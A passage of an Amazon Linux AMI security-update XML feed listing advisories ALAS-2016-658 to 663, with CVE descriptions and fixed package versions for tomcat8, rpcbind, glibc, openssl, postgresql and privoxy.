from="linux-security@amazon.com"><id>ALAS-2016-658</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-658: medium priority package update for tomcat8</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5345:
The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.67, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.
1311089:
CVE-2015-5345 tomcat: directory disclosure
CVE-2015-5174:
Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.
1265698:
CVE-2015-5174 tomcat: URL Normalization issue
CVE-2014-7810:
It was found that the expression language resolver evaluated expressions within a privileged code section. A malicious web application could use this flaw to bypass security manager protections.
1222573:
CVE-2014-7810 Tomcat/JbossWeb: security manager bypass via EL expressions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7810" title="" id="CVE-2014-7810" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5174" title="" id="CVE-2015-5174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5345" title="" id="CVE-2015-5345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.30-1.57.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-659</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-659: medium priority package update for rpcbind</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7236:
A use-after-free flaw related to the PMAP_CALLIT operation and TCP/UDP connections was discovered in rpcbind. A remote, unauthenticated attacker could possibly exploit this flaw to crash the rpcbind service (denial of service) by performing a series of UDP and TCP calls.
1264345:
CVE-2015-7236 rpcbind: Use-after-free vulnerability in PMAP_CALLIT
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7236" title="" id="CVE-2015-7236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rpcbind-debuginfo" version="0.2.0" release="11.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpcbind-debuginfo-0.2.0-11.8.amzn1.x86_64.rpm</filename></package><package name="rpcbind" version="0.2.0" release="11.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpcbind-0.2.0-11.8.amzn1.x86_64.rpm</filename></package><package name="rpcbind" version="0.2.0" release="11.8.amzn1" epoch="0" arch="i686"><filename>Packages/rpcbind-0.2.0-11.8.amzn1.i686.rpm</filename></package><package name="rpcbind-debuginfo" version="0.2.0" release="11.8.amzn1" epoch="0" arch="i686"><filename>Packages/rpcbind-debuginfo-0.2.0-11.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-660</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-660: low priority package update for glibc</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5229:
It was discovered that the calloc implementation in glibc could return memory areas which contain non-zero bytes. This could result in unexpected application behavior such as hangs or crashes.
1256285:
CVE-2015-5229 glibc: calloc may return non-zero memory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5229" title="" id="CVE-2015-5229" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.167.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-106.167.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-106.167.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-106.167.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="106.167.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-106.167.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-661</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-661: important priority package update for openssl</title><issued date="2016-03-10 16:30:00" /><updated date="2016-04-28 14:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2842:
The doapr_outch function in crypto/bio/b_print.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g does not verify that a certain memory allocation succeeds, which allows remote attackers to cause a denial of service (out-of-bounds write or memory consumption) or possibly have unspecified other impact via a long string, as demonstrated by a large amount of ASN.1 data, a different vulnerability than CVE-2016-0799.
1314757:
CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds
CVE-2016-0800:
A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker could potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN.
A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker can potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN.
1310593:
CVE-2016-0800 SSL/TLS: Cross-protocol attack on TLS using SSLv2 (DROWN)
CVE-2016-0799:
The fmtstr function in crypto/bio/b_print.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g improperly calculates string lengths, which allows remote attackers to cause a denial of service (overflow and out-of-bounds read) or possibly have unspecified other impact via a long string, as demonstrated by a large amount of ASN.1 data, a different vulnerability than CVE-2016-2842.
1312219:
CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions
CVE-2016-0797:
An integer overflow flaw, leading to a NULL pointer dereference or a heap-based memory corruption, was found in the way some BIGNUM functions of OpenSSL were implemented. Applications that use these functions with large untrusted input could crash or, potentially, execute arbitrary code.
1311880:
CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption
CVE-2016-0705:
A double-free flaw was found in the way OpenSSL parsed certain malformed DSA (Digital Signature Algorithm) private keys. An attacker could create specially crafted DSA private keys that, when processed by an application compiled against OpenSSL, could cause the application to crash.
1310596:
CVE-2016-0705 OpenSSL: Double-free in DSA code
CVE-2016-0702:
A side-channel attack was found that makes use of cache-bank conflicts on the Intel Sandy-Bridge microarchitecture. An attacker who has the ability to control code in a thread running on the same hyper-threaded core as the victim&#039;s thread that is performing decryption, could use this flaw to recover RSA private keys.
1310599:
CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
1289841:
CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH)
CVE-2015-3197:
A flaw was found in the way malicious SSLv2 clients could negotiate SSLv2 ciphers that were disabled on the server. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks.
A flaw was found in the way malicious SSLv2 clients could negotiate SSLv2 ciphers that have been disabled on the server. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks.
1301846:
CVE-2015-3197 OpenSSL: SSLv2 doesn't block disabled ciphers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3197" title="" id="CVE-2015-3197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0702" title="" id="CVE-2016-0702" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0705" title="" id="CVE-2016-0705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0797" title="" id="CVE-2016-0797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0799" title="" id="CVE-2016-0799" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0800" title="" id="CVE-2016-0800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2842" title="" id="CVE-2016-2842" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-14.89.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-14.89.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-14.89.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-14.89.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-14.89.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="14.89.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-14.89.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-662</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-662: important priority package update for postgresql94 postgresql93 postgresql92</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0773:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the PostgreSQL handling code for regular expressions. A remote attacker could use a specially crafted regular expression to cause PostgreSQL to crash or possibly execute arbitrary code.
1303832:
CVE-2016-0773 postgresql: case insensitive range handling integer overflow leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0773" title="" id="CVE-2016-0773" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-test" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.11" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.11-1.61.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.11" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.11-1.61.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.15" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.15-1.57.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.15" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.15-1.57.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.6" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.6-1.66.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.6-1.66.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.6" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.6-1.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-663</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-663: medium priority package update for privoxy</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1983:
The client_host function in parsers.c in Privoxy before 3.0.24 allows remote attackers to cause a denial of service (invalid read and crash) via an empty HTTP Host header.
1300972:
CVE-2016-1983 privoxy: invalid read via empty host header in client request
CVE-2016-1982:
The remove_chunked_transfer_coding function in filters.c in Privoxy before 3.0.24 allows remote attackers to cause a denial of service (invalid read and crash) via crafted chunk-encoded content.
